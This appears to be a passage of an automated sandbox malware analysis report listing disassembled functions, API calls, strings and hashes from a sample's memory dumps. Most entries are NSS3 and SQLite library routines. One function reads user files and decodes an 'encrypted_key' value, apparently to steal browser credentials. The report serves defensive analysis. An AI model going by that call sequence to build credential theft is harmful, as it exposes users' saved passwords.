Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 2f845574549fc8d4eb77f4697fe593322eb41d3db9e21ab9b8f83bea8788564a
Instruction ID: cc4ef64cb0f5789e8dcbe631d35885ee01ecdc652fe9d8b2db2a5e08bf4a056c
Opcode Fuzzy Hash: 2f845574549fc8d4eb77f4697fe593322eb41d3db9e21ab9b8f83bea8788564a
Instruction Fuzzy Hash: 6A01A2B17023423BFA4027BA6D8AF66255CAF51198F140431FE05E5982EF92E51984ED

Function 017F0610 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 017F0647
strtok_s.MSVCRT ref: 017F0A6F

Part of subcall function 017F8640: lstrlen.KERNEL32(00000000,?,?,017F3D93,017FE4BB,017FE4BA,?,?,017F4A46,00000000,?,013B09B8,?,017FE988,?,00000000), ref: 017F864B
Part of subcall function 017F8640: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F86A5

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 167b7a01d1df4da2dfabee77fb8e3155476c36e29ee9c2c55ba84d14d6ac0ea5
Instruction ID: bae455e71f5ec0b9e94abdd5fff5b0ad20877c3b19eb57ab4083788be2de5c8e
Opcode Fuzzy Hash: 167b7a01d1df4da2dfabee77fb8e3155476c36e29ee9c2c55ba84d14d6ac0ea5
Instruction Fuzzy Hash: A7C183B594021A9BCF14EF60DC9CFDBB779BB64304F0045DCE60997245EA70AA89CFA1

Function 017F2F20 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 017F2F3E
memset.MSVCRT ref: 017F2F55

Part of subcall function 017F6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 017F6D1B

lstrcat.KERNEL32(?,00000000), ref: 017F2F8C
lstrcat.KERNEL32(?,013C05C0), ref: 017F2FAB
lstrcat.KERNEL32(?,?), ref: 017F2FBF
lstrcat.KERNEL32(?,013C0758), ref: 017F2FD3

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F6CA0: GetFileAttributesA.KERNEL32(00000000,?,017EF807,?,00000000,?,00000000,017FE783,017FE782), ref: 017F6CAF

Part of subcall function 017E96E0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 017E9739
Part of subcall function 017E96E0: memcmp.MSVCRT ref: 017E9792

Part of subcall function 017E93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 017E93EC
Part of subcall function 017E93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 017E9411
Part of subcall function 017E93C0: LocalAlloc.KERNEL32(00000040,?), ref: 017E9431
Part of subcall function 017E93C0: ReadFile.KERNEL32(000000FF,?,00000000,017EF9B7,00000000), ref: 017E945A
Part of subcall function 017E93C0: LocalFree.KERNEL32(017EF9B7), ref: 017E9490
Part of subcall function 017E93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 017E949A

Part of subcall function 017F72D0: GlobalAlloc.KERNEL32(00000000,017F3077,017F3077), ref: 017F72E3

StrStrA.SHLWAPI(?,013C0470), ref: 017F308D
GlobalFree.KERNEL32(?), ref: 017F3189

Part of subcall function 017E94C0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,017E4BCE,00000000,00000000), ref: 017E94EF
Part of subcall function 017E94C0: LocalAlloc.KERNEL32(00000040,?,?,?,017E4BCE,00000000,?), ref: 017E9501
Part of subcall function 017E94C0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,017E4BCE,00000000,00000000), ref: 017E952A
Part of subcall function 017E94C0: LocalFree.KERNEL32(?,?,?,?,017E4BCE,00000000,?), ref: 017E953F

Part of subcall function 017E9800: memcmp.MSVCRT ref: 017E981B
Part of subcall function 017E9800: memset.MSVCRT ref: 017E984E
Part of subcall function 017E9800: LocalAlloc.KERNEL32(00000040,?), ref: 017E989E

lstrcat.KERNEL32(?,00000000), ref: 017F311A
StrCmpCA.SHLWAPI(?,017FE496,?,?,?,?,000003E8), ref: 017F3137
lstrcat.KERNEL32(00000000,00000000), ref: 017F3149
lstrcat.KERNEL32(00000000,?), ref: 017F315C
lstrcat.KERNEL32(00000000,017FE8A0), ref: 017F316B

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 3662689742-0
Opcode ID: 44ae1ced7def30b97474b5f6026d0d24b6244de8a125e3af9a7f6f78717f0373
Instruction ID: ae941fac2a8e473faba81585e9e80d8c8884e8ee017da72756972820b452115a
Opcode Fuzzy Hash: 44ae1ced7def30b97474b5f6026d0d24b6244de8a125e3af9a7f6f78717f0373
Instruction Fuzzy Hash: 657152B6D00209ABCB14EBA4DC89FDEB7B9AB58704F00859CE70997244EA34DB55CF61

Function 6C5A4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C5678F8), ref: 6C5A4E6D

Part of subcall function 6C5409E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C5406A2,00000000,?), ref: 6C5409F8
Part of subcall function 6C5409E0: malloc.MOZGLUE(0000001F), ref: 6C540A18
Part of subcall function 6C5409E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C540A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C5678F8), ref: 6C5A4ED9

Part of subcall function 6C595920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C597703,?,00000000,00000000), ref: 6C595942
Part of subcall function 6C595920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C597703), ref: 6C595954
Part of subcall function 6C595920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C59596A
Part of subcall function 6C595920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C595984
Part of subcall function 6C595920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C595999
Part of subcall function 6C595920: free.MOZGLUE(00000000), ref: 6C5959BA
Part of subcall function 6C595920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C5959D3
Part of subcall function 6C595920: free.MOZGLUE(00000000), ref: 6C5959F5
Part of subcall function 6C595920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C595A0A
Part of subcall function 6C595920: free.MOZGLUE(00000000), ref: 6C595A2E
Part of subcall function 6C595920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C595A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4EB3

Part of subcall function 6C5A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5A4EB8,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A484C
Part of subcall function 6C5A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5A4EB8,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A486D
Part of subcall function 6C5A4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C5A4EB8,?), ref: 6C5A4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4EC0

Part of subcall function 6C5A4470: TlsGetValue.KERNEL32(00000000,?,6C567296,00000000), ref: 6C5A4487
Part of subcall function 6C5A4470: EnterCriticalSection.KERNEL32(?,?,?,6C567296,00000000), ref: 6C5A44A0
Part of subcall function 6C5A4470: PR_Unlock.NSS3(?,?,?,?,6C567296,00000000), ref: 6C5A44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C67DCB0,00000000), ref: 6C5A4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C5A501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A506B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: b90a183097454ace19786e87a6ee4fcdcba9e1cea6cc2e38b2ac88da020828b2
Instruction ID: ded8efb84ae7ba9392b383723c10e1bdb00110f27b10ebcaa3d37a7163250210
Opcode Fuzzy Hash: b90a183097454ace19786e87a6ee4fcdcba9e1cea6cc2e38b2ac88da020828b2
Instruction Fuzzy Hash: A651E3B1D00601EBEB019FA7EC45A9F77B4FF4535CF144535E80686B12FB31D92A8A92

Function 6C54ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C54ACE2
malloc.MOZGLUE(00000001), ref: 6C54ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C54AD02
TlsGetValue.KERNEL32 ref: 6C54AD3C
calloc.MOZGLUE(00000001,?), ref: 6C54AD8C
PR_Unlock.NSS3 ref: 6C54ADC0
free.MOZGLUE(00000000), ref: 6C54AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C54AE58
free.MOZGLUE(00000000), ref: 6C54AE69
free.MOZGLUE(?), ref: 6C54AE78
PR_Unlock.NSS3 ref: 6C54AE8C
free.MOZGLUE(?), ref: 6C54AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C54AEC7

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 3ece8a32fd5fa1d4af1dc1122a606192bd25d5405ac857f5df43247297b2c2dd
Instruction ID: e6ba32cc30e49d302c1432092dac5438e508d5dc56e465f3a898de7035d411b7
Opcode Fuzzy Hash: 3ece8a32fd5fa1d4af1dc1122a606192bd25d5405ac857f5df43247297b2c2dd
Instruction Fuzzy Hash: 6951D2B1E01116EBDF40DF9ADC81AAE77B4BB46348F148435D915A7B00E332A925CBDA

Function 6C624C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C624CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C624CFD
sqlite3_value_text16.NSS3(?), ref: 6C624D44

Strings

invalid, xrefs: 6C624CF1
unknown error, xrefs: 6C624D56
API call with %s database connection pointer, xrefs: 6C624CF6
another row available, xrefs: 6C624D20
bad parameter or other API misuse, xrefs: 6C624D05
abort due to ROLLBACK, xrefs: 6C624D27, 6C624D33
no more rows available, xrefs: 6C624D2E
out of memory, xrefs: 6C624C78, 6C624C9E

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 4bcc5e3ffb7ef2beaad387f1038b5933ff4e458fb14bab9a69423c6537522180
Instruction ID: b378724027b1c6ed35238f89ed638df0cc48ba242cd8059fdf296409e80ce764
Opcode Fuzzy Hash: 4bcc5e3ffb7ef2beaad387f1038b5933ff4e458fb14bab9a69423c6537522180
Instruction Fuzzy Hash: 263178B3B09911A7D7084A29A8007F577A1BB82318F150925D8244BF55CBEDAC22CFEF

Function 6C582CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C582CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C582D07

Part of subcall function 6C6609D0: PR_Now.NSS3 ref: 6C660A22
Part of subcall function 6C6609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C660A35
Part of subcall function 6C6609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C660A66
Part of subcall function 6C6609D0: PR_GetCurrentThread.NSS3 ref: 6C660A70
Part of subcall function 6C6609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C660A9D
Part of subcall function 6C6609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C660AC8
Part of subcall function 6C6609D0: PR_vsmprintf.NSS3(?,?), ref: 6C660AE8
Part of subcall function 6C6609D0: EnterCriticalSection.KERNEL32(?), ref: 6C660B19
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C660B48
Part of subcall function 6C6609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C660C76
Part of subcall function 6C6609D0: PR_LogFlush.NSS3 ref: 6C660C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C582D22

Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(?), ref: 6C660B88
Part of subcall function 6C6609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C660C5D
Part of subcall function 6C6609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C660C8D
Part of subcall function 6C6609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660C9C
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(?), ref: 6C660CD1
Part of subcall function 6C6609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C660CEC
Part of subcall function 6C6609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660CFB
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C660D16
Part of subcall function 6C6609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C660D26
Part of subcall function 6C6609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660D35
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C660D65
Part of subcall function 6C6609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C660D70
Part of subcall function 6C6609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C660D90
Part of subcall function 6C6609D0: free.MOZGLUE(00000000), ref: 6C660D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C582D3B

Part of subcall function 6C6609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C660BAB
Part of subcall function 6C6609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660BBA
Part of subcall function 6C6609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C582D54

Part of subcall function 6C6609D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C660BCB
Part of subcall function 6C6609D0: EnterCriticalSection.KERNEL32(?), ref: 6C660BDE
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(?), ref: 6C660C16

Strings

ulPinLen = %d, xrefs: 6C582D36
pPin = 0x%p, xrefs: 6C582D1D
pLabel = 0x%p, xrefs: 6C582D4F
slotID = 0x%x, xrefs: 6C582D02
C_InitToken, xrefs: 6C582CE7
nfl, xrefs: 6C582D6C, 6C582D9A

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nfl
API String ID: 420000887-1425126228
Opcode ID: 0ae0e6afcea5ee5bc0b86fc31a120e3e6d71484a0bbd31fc97a390e902c9ad9d
Instruction ID: 58d90bb75094ec4954443a7773fef2b7701ac77eb7b2c4d05cf08883adc8576f
Opcode Fuzzy Hash: 0ae0e6afcea5ee5bc0b86fc31a120e3e6d71484a0bbd31fc97a390e902c9ad9d
Instruction Fuzzy Hash: 4E21B675202154EFDB009F55DDCCA453FF2EB8231DF448525EA0897A62D7308C6ACB6D

Function 6C554880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5548A2
PORT_NewArena_Util.NSS3(00000800), ref: 6C5548C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C5548D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C5548FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C554908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C554947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C55496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C554988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C678DAC,?), ref: 6C5549DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5549FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C554ACB

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: 2d18125ac582c50a68b0f2d8b1d2e0e0697723fe42fdcffd97c4609355864c53
Instruction ID: 58c92fc9e03e857b2616cf17a470c9271bfbe1173e4df8b626f0ddd9bb1ac922
Opcode Fuzzy Hash: 2d18125ac582c50a68b0f2d8b1d2e0e0697723fe42fdcffd97c4609355864c53
Instruction Fuzzy Hash: 215114B5A003018BEB50CF65DC4179B77E6EF8130CF54452AE929ABB81E771D834CB66

Function 6C622D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C622D9F

Part of subcall function 6C4DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C53F9C9,?,6C53F4DA,6C53F9C9,?,?,6C50369A), ref: 6C4DCA7A
Part of subcall function 6C4DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4DCB26

sqlite3_exec.NSS3(?,?,6C622F70,?,?), ref: 6C622DF9
sqlite3_free.NSS3(00000000), ref: 6C622E2C
sqlite3_free.NSS3(?), ref: 6C622E3A
sqlite3_free.NSS3(?), ref: 6C622E52
sqlite3_mprintf.NSS3(6C68AAF9,?), ref: 6C622E62
sqlite3_free.NSS3(?), ref: 6C622E70
sqlite3_free.NSS3(?), ref: 6C622E89
sqlite3_free.NSS3(?), ref: 6C622EBB
sqlite3_free.NSS3(?), ref: 6C622ECB
sqlite3_free.NSS3(00000000), ref: 6C622F3E
sqlite3_free.NSS3(?), ref: 6C622F4C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 826f4b3f2d734017c9d1affda5bf03d0a637b5f678e7fef7429205fe4ad776e1
Instruction ID: ebde83c65f5b0d80ba71342ce05c46a83f4cffb7abfd4843f95af81d7a195c8e
Opcode Fuzzy Hash: 826f4b3f2d734017c9d1affda5bf03d0a637b5f678e7fef7429205fe4ad776e1
Instruction Fuzzy Hash: 73617CB5E102068BEB00CFA8D894BDEB7E1EF58358F150428DC55AB741EB39E845CFA5

Function 6C4D4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4D97
PR_Lock.NSS3(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4DBA
PR_WaitCondVar.NSS3 ref: 6C4D4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4DEF

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
